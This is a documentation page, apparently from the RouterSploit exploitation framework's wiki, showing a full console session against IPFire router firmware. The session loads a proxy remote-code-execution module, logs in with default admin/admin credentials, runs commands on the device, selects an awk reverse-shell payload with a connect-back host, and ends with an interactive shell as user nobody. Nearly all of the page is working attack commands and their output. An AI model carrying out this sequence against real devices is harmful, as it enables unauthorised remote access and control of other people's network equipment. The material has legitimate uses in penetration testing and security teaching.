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Exploiting Target

Marcin Bury edited this page Oct 14, 2018 · 3 revisions

Exploiting Target

Example Exploitation

rsf > use exploits/routers/ipfire/ipfire_proxy_rce
rsf (IPFire Proxy RCE) > set target
[+] target =>
rsf (IPFire Proxy RCE) > show options

Target options:

   Name       Current settings     Description
   ----       ----------------     -----------
   ssl        true                 SSL enabled: true/false
   target         Target IPv4 or IPv6 address
   port       444                  Target HTTP port

Module options:

   Name          Current settings     Description
   ----          ----------------     -----------
   verbosity     true                 Verbosity enabled: true/false
   username      admin                Username to log in with
   password      admin                Password to log in with

rsf (IPFire Proxy RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > uname -a
[*] Executing 'uname -a' on the device...
Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux

cmd > show payloads
[*] Available payloads:

   Payload             Name                Description
   -------             ----                -----------
   awk_bind_udp        Awk Bind UDP        Creates an interactive udp bind shell by using (g)awk.
   awk_bind_tcp        Awk Bind TCP        Creates an interactive tcp bind shell by using (g)awk.
   awk_reverse_tcp     Awk Reverse TCP     Creates an interactive tcp reverse shell by using (g)awk.

cmd > set payload awk_reverse_tcp
cmd (Awk Reverse TCP) > show options

Payload Options:

   Name        Current settings     Description
   ----        ----------------     -----------
   lhost                            Connect-back IP address
   lport       5555                 Connect-back TCP Port
   encoder                          Encoder
   cmd         awk                  Awk binary

cmd (Awk Reverse TCP) > set lhost
lhost =>
cmd (Awk Reverse TCP) > run
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from
[+] Enjoy your shell
uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
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